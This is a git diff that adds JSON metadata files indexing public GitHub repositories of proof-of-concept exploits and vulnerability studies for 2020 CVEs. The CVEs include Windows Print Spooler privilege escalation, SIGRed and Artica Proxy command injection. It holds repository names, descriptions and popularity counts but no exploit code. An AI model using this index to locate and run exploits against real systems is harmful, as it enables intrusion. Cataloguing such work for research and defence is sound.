"name": "CVE-2020-12800", + "full_name": "amartinsec\/CVE-2020-12800", + "owner": { + "login": "amartinsec", + "id": 65378624, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65378624?v=4", + "html_url": "https:\/\/github.com\/amartinsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amartinsec\/CVE-2020-12800", + "description": "POC Script for CVE-2020-12800: RCE through Unrestricted File Type Upload ", + "fork": false, + "created_at": "2020-05-15T01:50:36Z", + "updated_at": "2024-11-13T08:27:48Z", + "pushed_at": "2023-01-06T23:08:57Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": true, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 27, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-12828.json b/2020/CVE-2020-12828.json new file mode 100644 index 0000000000..a17c897b56 --- /dev/null +++ b/2020/CVE-2020-12828.json @@ -0,0 +1,40 @@ +[ + { + "id": 276136205, + "name": "ZombieVPN", + "full_name": "0xsha\/ZombieVPN", + "owner": { + "login": "0xsha", + "id": 54356171, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54356171?v=4", + "html_url": "https:\/\/github.com\/0xsha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xsha\/ZombieVPN", + "description": "CVE-2020-12828 PoC and Analysis. ", + "fork": false, + "created_at": "2020-06-30T15:18:58Z", + "updated_at": "2024-08-12T20:03:13Z", + "pushed_at": "2020-06-30T16:03:35Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bugbounty", + "cve", + "cve-2020-12828", + "poc", + "vulnerability", + "writeup" + ], + "visibility": "public", + "forks": 11, + "watchers": 28, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-1283.json b/2020/CVE-2020-1283.json new file mode 100644 index 0000000000..7a56cc6ac5 --- /dev/null +++ b/2020/CVE-2020-1283.json @@ -0,0 +1,33 @@ +[ + { + "id": 256458153, + "name": "CVE-2020-1283_Windows-Denial-of-Service-Vulnerability", + "full_name": "RedyOpsResearchLabs\/CVE-2020-1283_Windows-Denial-of-Service-Vulnerability", + "owner": { + "login": "RedyOpsResearchLabs", + "id": 63094523, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63094523?v=4", + "html_url": "https:\/\/github.com\/RedyOpsResearchLabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RedyOpsResearchLabs\/CVE-2020-1283_Windows-Denial-of-Service-Vulnerability", + "description": "Exploit Code for CVE-2020-1283 - Windows-Denial-of-Service-Vulnerability", + "fork": false, + "created_at": "2020-04-17T09:21:36Z", + "updated_at": "2021-09-17T11:03:25Z", + "pushed_at": "2020-06-16T08:08:46Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 7, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-12856.json b/2020/CVE-2020-12856.json new file mode 100644 index 0000000000..e6987e0a2b --- /dev/null +++ b/2020/CVE-2020-12856.json @@ -0,0 +1,33 @@ +[ + { + "id": 264055213, + "name": "COVIDSafe-CVE-2020-12856", + "full_name": "alwentiu\/COVIDSafe-CVE-2020-12856", + "owner": { + "login": "alwentiu", + "id": 39551518, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39551518?v=4", + "html_url": "https:\/\/github.com\/alwentiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alwentiu\/COVIDSafe-CVE-2020-12856", + "description": "A bluetooth-related vulnerability in some contact tracing apps", + "fork": false, + "created_at": "2020-05-15T00:18:03Z", + "updated_at": "2024-08-12T20:01:29Z", + "pushed_at": "2020-06-26T03:41:19Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 26, + "score": 0, + "subscribers_count": 12 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-12928.json b/2020/CVE-2020-12928.json new file mode 100644 index 0000000000..e9bad3fa81 --- /dev/null +++ b/2020/CVE-2020-12928.json @@ -0,0 +1,33 @@ +[ + { + "id": 311661479, + "name": "AmdRyzenMasterCheat", + "full_name": "ekknod\/AmdRyzenMasterCheat", + "owner": { + "login": "ekknod", + "id": 17956079, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17956079?v=4", + "html_url": "https:\/\/github.com\/ekknod", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ekknod\/AmdRyzenMasterCheat", + "description": "Early 2019 - late 2020. R.I.P. CVE-2020-12928 https:\/\/h0mbre.github.io\/RyzenMaster_CVE\/#", + "fork": false, + "created_at": "2020-11-10T13:08:21Z", + "updated_at": "2024-11-27T08:57:43Z", + "pushed_at": "2021-02-14T15:08:01Z", + "stargazers_count": 47, + "watchers_count": 47, + "has_discussions": false, + "forks_count": 25, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 25, + "watchers": 47, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-1301.json b/2020/CVE-2020-1301.json new file mode 100644 index 0000000000..1f3928045f --- /dev/null +++ b/2020/CVE-2020-1301.json @@ -0,0 +1,36 @@ +[ + { + "id": 272063943, + "name": "CVE-2020-1301", + "full_name": "shubham0d\/CVE-2020-1301", + "owner": { + "login": "shubham0d", + "id": 12750163, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12750163?v=4", + "html_url": "https:\/\/github.com\/shubham0d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shubham0d\/CVE-2020-1301", + "description": "POC exploit for SMBLost vulnerability (CVE-2020-1301)", + "fork": false, + "created_at": "2020-06-13T18:24:26Z", + "updated_at": "2024-11-09T12:28:01Z", + "pushed_at": "2020-06-13T18:55:03Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "smb1", + "smblost" + ], + "visibility": "public", + "forks": 15, + "watchers": 16, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-13094.json b/2020/CVE-2020-13094.json new file mode 100644 index 0000000000..8344c280ba --- /dev/null +++ b/2020/CVE-2020-13094.json @@ -0,0 +1,33 @@ +[ + { + "id": 284480533, + "name": "CVE-2020-13094", + "full_name": "mkelepce\/CVE-2020-13094", + "owner": { + "login": "mkelepce", + "id": 10780392, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10780392?v=4", + "html_url": "https:\/\/github.com\/mkelepce", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mkelepce\/CVE-2020-13094", + "description": " Dolibarr 11.0.3 - Persistent Cross-Site Scripting", + "fork": false, + "created_at": "2020-08-02T14:43:43Z", + "updated_at": "2020-08-02T14:45:17Z", + "pushed_at": "2020-08-02T14:45:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-1313.json b/2020/CVE-2020-1313.json new file mode 100644 index 0000000000..35aae7c9d3 --- /dev/null +++ b/2020/CVE-2020-1313.json @@ -0,0 +1,33 @@ +[ + { + "id": 283541946, + "name": "CVE-2020-1313", + "full_name": "irsl\/CVE-2020-1313", + "owner": { + "login": "irsl", + "id": 6357121, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6357121?v=4", + "html_url": "https:\/\/github.com\/irsl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/irsl\/CVE-2020-1313", + "description": "Proof of concept exploit of Windows Update Orchestrator Service Elevation of Privilege Vulnerability", + "fork": false, + "created_at": "2020-07-29T15:56:50Z", + "updated_at": "2024-10-29T16:03:10Z", + "pushed_at": "2020-07-30T07:48:40Z", + "stargazers_count": 121, + "watchers_count": 121, + "has_discussions": false, + "forks_count": 25, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 25, + "watchers": 121, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-13151.json b/2020/CVE-2020-13151.json new file mode 100644 index 0000000000..01ec703021 --- /dev/null +++ b/2020/CVE-2020-13151.json @@ -0,0 +1,36 @@ +[ + { + "id": 284276011, + "name": "CVE-2020-13151", + "full_name": "b4ny4n\/CVE-2020-13151", + "owner": { + "login": "b4ny4n", + "id": 18220016, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18220016?v=4", + "html_url": "https:\/\/github.com\/b4ny4n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b4ny4n\/CVE-2020-13151", + "description": "POC for CVE-2020-13151", + "fork": false, + "created_at": "2020-08-01T14:29:59Z", + "updated_at": "2024-11-23T20:27:06Z", + "pushed_at": "2020-08-03T18:55:37Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "aerospike", + "cve-2020-13151" + ], + "visibility": "public", + "forks": 5, + "watchers": 28, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-13158.json b/2020/CVE-2020-13158.json new file mode 100644 index 0000000000..c0ec7ce0f5 --- /dev/null +++ b/2020/CVE-2020-13158.json @@ -0,0 +1,33 @@ +[ + { + "id": 273527147, + "name": "CVE-2020-13158", + "full_name": "InfoSec4Fun\/CVE-2020-13158", + "owner": { + "login": "InfoSec4Fun", + "id": 59775675, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59775675?v=4", + "html_url": "https:\/\/github.com\/InfoSec4Fun", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/InfoSec4Fun\/CVE-2020-13158", + "description": "CVE-2020-13158 - Artica Proxy before 4.30.000000 Community Edition allows Directory Traversal ", + "fork": false, + "created_at": "2020-06-19T15:28:54Z", + "updated_at": "2020-06-29T16:35:31Z", + "pushed_at": "2020-06-23T10:57:04Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-13159.json b/2020/CVE-2020-13159.json new file mode 100644 index 0000000000..69e340e4c8 --- /dev/null +++ b/2020/CVE-2020-13159.json @@ -0,0 +1,33 @@ +[ + { + "id": 273530213, + "name": "CVE-2020-13159", + "full_name": "InfoSec4Fun\/CVE-2020-13159", + "owner": { + "login": "InfoSec4Fun", + "id": 59775675, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59775675?v=4", + "html_url": "https:\/\/github.com\/InfoSec4Fun", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/InfoSec4Fun\/CVE-2020-13159", + "description": "CVE-2020-13159 - Artica Proxy before 4.30.000000 Community Edition allows OS command injection.", + "fork": false, + "created_at": "2020-06-19T15:43:19Z", + "updated_at": "2020-07-27T15:19:58Z", + "pushed_at": "2020-06-23T10:57:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": true, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-13162.json b/2020/CVE-2020-13162.json new file mode 100644 index 0000000000..1830787353 --- /dev/null +++ b/2020/CVE-2020-13162.json @@ -0,0 +1,33 @@ +[ + { + "id": 292356141, + "name": "tu-TOCTOU-kaiu-TOCMEU-CVE-2020-13162-", + "full_name": "redtimmy\/tu-TOCTOU-kaiu-TOCMEU-CVE-2020-13162-", + "owner": { + "login": "redtimmy", + "id": 40774163, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40774163?v=4", + "html_url": "https:\/\/github.com\/redtimmy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/redtimmy\/tu-TOCTOU-kaiu-TOCMEU-CVE-2020-13162-", + "description": "Exploit for CVE-2020-13162", + "fork": false, + "created_at": "2020-09-02T17:58:32Z", + "updated_at": "2024-08-12T20:05:23Z", + "pushed_at": "2020-09-02T19:14:21Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-13254.json b/2020/CVE-2020-13254.json new file mode 100644 index 0000000000..3b4e1e8333 --- /dev/null +++ b/2020/CVE-2020-13254.json @@ -0,0 +1,33 @@ +[ + { + "id": 270368383, + "name": "django-cve-2020-13254", + "full_name": "danpalmer\/django-cve-2020-13254", + "owner": { + "login": "danpalmer", + "id": 202400, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/202400?v=4", + "html_url": "https:\/\/github.com\/danpalmer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/danpalmer\/django-cve-2020-13254", + "description": "Vulnerability demonstration for Django CVE-2020-13254", + "fork": false, + "created_at": "2020-06-07T16:42:33Z", + "updated_at": "2024-08-12T20:02:22Z", + "pushed_at": "2020-06-07T18:07:46Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-13259.json b/2020/CVE-2020-13259.json new file mode 100644 index 0000000000..07e0ad6fce --- /dev/null +++ b/2020/CVE-2020-13259.json @@ -0,0 +1,33 @@ +[ + { + "id": 291721408, + "name": "CVE-2020-13259", + "full_name": "UrielYochpaz\/CVE-2020-13259", + "owner": { + "login": "UrielYochpaz", + "id": 36864886, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36864886?v=4", + "html_url": "https:\/\/github.com\/UrielYochpaz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/UrielYochpaz\/CVE-2020-13259", + "description": "PoC of Full Account Takeover on RAD SecFlow-1v ", + "fork": false, + "created_at": "2020-08-31T13:22:21Z", + "updated_at": "2023-01-09T21:55:48Z", + "pushed_at": "2023-01-09T21:55:44Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-13277.json b/2020/CVE-2020-13277.json new file mode 100644 index 0000000000..229e780d03 --- /dev/null +++ b/2020/CVE-2020-13277.json @@ -0,0 +1,37 @@ +[ + { + "id": 308861899, + "name": "CVE-2020-13277", + "full_name": "EXP-Docs\/CVE-2020-13277", + "owner": { + "login": "EXP-Docs", + "id": 132466462, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132466462?v=4", + "html_url": "https:\/\/github.com\/EXP-Docs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EXP-Docs\/CVE-2020-13277", + "description": "CVE-2020-13277 靶场: Gitlab 逻辑漏洞 - 任意用户越权访问私有仓库", + "fork": false, + "created_at": "2020-10-31T11:01:26Z", + "updated_at": "2024-03-25T03:41:10Z", + "pushed_at": "2023-01-24T10:35:46Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2020-13277", + "learning" + ], + "visibility": "public", + "forks": 5, + "watchers": 25, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-1337.json b/2020/CVE-2020-1337.json new file mode 100644 index 0000000000..1aef1c1d89 --- /dev/null +++ b/2020/CVE-2020-1337.json @@ -0,0 +1,171 @@ +[ + { + "id": 281334440, + "name": "CVE-2020-1337-exploit", + "full_name": "math1as\/CVE-2020-1337-exploit", + "owner": { + "login": "math1as", + "id": 13290978, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13290978?v=4", + "html_url": "https:\/\/github.com\/math1as", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/math1as\/CVE-2020-1337-exploit", + "description": "CVE-2020-1337 Windows Print Spooler Privilege Escalation", + "fork": false, + "created_at": "2020-07-21T08:01:20Z", + "updated_at": "2024-08-12T20:03:57Z", + "pushed_at": "2023-12-15T02:24:29Z", + "stargazers_count": 152, + "watchers_count": 152, + "has_discussions": false, + "forks_count": 26, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 26, + "watchers": 152, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 286737584, + "name": "CVE-2020-1337", + "full_name": "VoidSec\/CVE-2020-1337", + "owner": { + "login": "VoidSec", + "id": 5717603, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5717603?v=4", + "html_url": "https:\/\/github.com\/VoidSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VoidSec\/CVE-2020-1337", + "description": "CVE-2020-1337 a bypass of (PrintDemon) CVE-2020-1048’s patch", + "fork": false, + "created_at": "2020-08-11T12:22:56Z", + "updated_at": "2024-04-02T17:47:26Z", + "pushed_at": "2020-08-11T17:23:04Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "cve-2020-1048", + "cve-2020-1337", + "exploit", + "faxhell", + "poc", + "printdemon", + "voidsec", + "windows" + ], + "visibility": "public", + "forks": 2, + "watchers": 14, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 286767343, + "name": "CVE-2020-1337", + "full_name": "neofito\/CVE-2020-1337", + "owner": { + "login": "neofito", + "id": 1921186, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1921186?v=4", + "html_url": "https:\/\/github.com\/neofito", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/neofito\/CVE-2020-1337", + "description": "CVE-2020-1048 bypass: binary planting PoC", + "fork": false, + "created_at": "2020-08-11T14:34:07Z", + "updated_at": "2023-07-30T09:35:33Z", + "pushed_at": "2020-08-20T15:15:50Z", + "stargazers_count": 32, + "watchers_count": 32, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 32, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 286979865, + "name": "cve-2020-1337-poc", + "full_name": "sailay1996\/cve-2020-1337-poc", + "owner": { + "login": "sailay1996", + "id": 16739401, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16739401?v=4", + "html_url": "https:\/\/github.com\/sailay1996", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sailay1996\/cve-2020-1337-poc", + "description": "poc for CVE-2020-1337 (Windows Print Spooler Elevation of Privilege)", + "fork": false, + "created_at": "2020-08-12T10:05:36Z", + "updated_at": "2024-09-24T16:58:55Z", + "pushed_at": "2020-08-13T07:16:12Z", + "stargazers_count": 172, + "watchers_count": 172, + "has_discussions": false, + "forks_count": 48, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-1337", + "windows-exploitation", + "windows-privilege-escalation" + ], + "visibility": "public", + "forks": 48, + "watchers": 172, + "score": 0, + "subscribers_count": 11 + }, + { + "id": 354442383, + "name": "cve-2020-1337-poc", + "full_name": "ZTK-009\/cve-2020-1337-poc", + "owner": { + "login": "ZTK-009", + "id": 29515145, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29515145?v=4", + "html_url": "https:\/\/github.com\/ZTK-009", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZTK-009\/cve-2020-1337-poc", + "description": null, + "fork": false, + "created_at": "2021-04-04T02:56:02Z", + "updated_at": "2021-06-11T19:37:42Z", + "pushed_at": "2021-04-04T02:56:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-13401.json b/2020/CVE-2020-13401.json new file mode 100644 index 0000000000..0362d96963 --- /dev/null +++ b/2020/CVE-2020-13401.json @@ -0,0 +1,33 @@ +[ + { + "id": 353441981, + "name": "Docker-Container-CVE-2020-13401", + "full_name": "arax-zaeimi\/Docker-Container-CVE-2020-13401", + "owner": { + "login": "arax-zaeimi", + "id": 57586819, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57586819?v=4", + "html_url": "https:\/\/github.com\/arax-zaeimi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/arax-zaeimi\/Docker-Container-CVE-2020-13401", + "description": "Study on CVE-2020-13401 vulnerability of containers in dockers older than 19.03.11", + "fork": false, + "created_at": "2021-03-31T17:45:10Z", + "updated_at": "2021-11-04T23:38:47Z", + "pushed_at": "2021-03-31T20:47:07Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-13405.json b/2020/CVE-2020-13405.json new file mode 100644 index 0000000000..4a0e330941 --- /dev/null +++ b/2020/CVE-2020-13405.json @@ -0,0 +1,33 @@ +[ + { + "id": 725175259, + "name": "CVE-2020-13405", + "full_name": "mrnazu\/CVE-2020-13405", + "owner": { + "login": "mrnazu", + "id": 108541991, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108541991?v=4", + "html_url": "https:\/\/github.com\/mrnazu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mrnazu\/CVE-2020-13405", + "description": "MicroWeber Unauthenticated User Database Disclosure - CVE-2020-13405", + "fork": false, + "created_at": "2023-11-29T15:38:11Z", + "updated_at": "2023-11-29T16:20:25Z", + "pushed_at": "2023-12-25T14:33:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-13424.json b/2020/CVE-2020-13424.json new file mode 100644 index 0000000000..9356699ed9 --- /dev/null +++ b/2020/CVE-2020-13424.json @@ -0,0 +1,33 @@ +[ + { + "id": 284480950, + "name": "CVE-2020-13424", + "full_name": "mkelepce\/CVE-2020-13424", + "owner": { + "login": "mkelepce", + "id": 10780392, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10780392?v=4", + "html_url": "https:\/\/github.com\/mkelepce", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mkelepce\/CVE-2020-13424", + "description": " Joomla! Plugin XCloner Backup 3.5.3 - Local File Inclusion (Authenticated)", + "fork": false, + "created_at": "2020-08-02T14:46:10Z", + "updated_at": "2023-08-05T17:58:49Z", + "pushed_at": "2020-08-02T14:49:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-13457.json b/2020/CVE-2020-13457.json new file mode 100644 index 0000000000..0510375f7e --- /dev/null +++ b/2020/CVE-2020-13457.json @@ -0,0 +1,33 @@ +[ + { + "id": 268529776, + "name": "CVE-2020-13457", + "full_name": "alt3kx\/CVE-2020-13457", + "owner": { + "login": "alt3kx", + "id": 3140111, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alt3kx\/CVE-2020-13457", + "description": "CVE-2020-13457", + "fork": false, + "created_at": "2020-06-01T13:27:11Z", + "updated_at": "2024-08-12T20:02:08Z", + "pushed_at": "2020-06-01T13:35:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-1349.json b/2020/CVE-2020-1349.json new file mode 100644 index 0000000000..2ccd72a5c5 --- /dev/null +++ b/2020/CVE-2020-1349.json @@ -0,0 +1,33 @@ +[ + { + "id": 283193307, + "name": "CVE-2020-1349", + "full_name": "0neb1n\/CVE-2020-1349", + "owner": { + "login": "0neb1n", + "id": 22587350, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22587350?v=4", + "html_url": "https:\/\/github.com\/0neb1n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0neb1n\/CVE-2020-1349", + "description": null, + "fork": false, + "created_at": "2020-07-28T11:33:38Z", + "updated_at": "2024-08-12T20:04:12Z", + "pushed_at": "2020-07-28T13:36:41Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-1350.json b/2020/CVE-2020-1350.json new file mode 100644 index 0000000000..1cf7a4bc3d --- /dev/null +++ b/2020/CVE-2020-1350.json @@ -0,0 +1,456 @@ +[ + { + "id": 246641886, + "name": "NSE-scripts", + "full_name": "psc4re\/NSE-scripts", + "owner": { + "login": "psc4re", + "id": 4672886, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4672886?v=4", + "html_url": "https:\/\/github.com\/psc4re", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/psc4re\/NSE-scripts", + "description": "NSE scripts to detect CVE-2020-1350 SIGRED and CVE-2020-0796 SMBGHOST, CVE-2021-21972, proxyshell, CVE-2021-34473", + "fork": false, + "created_at": "2020-03-11T17:51:29Z", + "updated_at": "2024-11-06T12:30:06Z", + "pushed_at": "2021-08-16T18:16:20Z", + "stargazers_count": 161, + "watchers_count": 161, + "has_discussions": false, + "forks_count": 29, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-1350", + "cve-2021-21972", + "cve-2021-34473", + "nmap", + "nmap-scan-script", + "nmap-scripts", + "nse-script", + "poc", + "proxyshell", + "scanner", + "sigred", + "smbghost", + "smbv3", + "vcenter", + "vulnerability", + "vulnerability-detection" + ], + "visibility": "public", + "forks": 29, + "watchers": 161, + "score": 0, + "subscribers_count": 10 + }, + { + "id": 279670211, + "name": "CVE-2020-1350_HoneyPoC", + "full_name": "ZephrFish\/CVE-2020-1350_HoneyPoC", + "owner": { + "login": "ZephrFish", + "id": 5783068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5783068?v=4", + "html_url": "https:\/\/github.com\/ZephrFish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZephrFish\/CVE-2020-1350_HoneyPoC", + "description": "HoneyPoC: Proof-of-Concept (PoC) script to exploit SIGRed (CVE-2020-1350). Achieves Domain Admin on Domain Controllers running Windows Server 2000 up to Windows Server 2019.", + "fork": false, + "created_at": "2020-07-14T19:02:25Z", + "updated_at": "2024-11-10T12:13:04Z", + "pushed_at": "2021-06-10T02:46:52Z", + "stargazers_count": 281, + "watchers_count": 281, + "has_discussions": false, + "forks_count": 72, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-1350", + "sigred" + ], + "visibility": "public", + "forks": 72, + "watchers": 281, + "score": 0, + "subscribers_count": 11 + }, + { + "id": 279675165, + "name": "CVE-2020-1350", + "full_name": "mr-r3b00t\/CVE-2020-1350", + "owner": { + "login": "mr-r3b00t", + "id": 14963690, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14963690?v=4", + "html_url": "https:\/\/github.com\/mr-r3b00t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mr-r3b00t\/CVE-2020-1350", + "description": null, + "fork": false, + "created_at": "2020-07-14T19:28:46Z", + "updated_at": "2024-08-12T20:03:44Z", + "pushed_at": 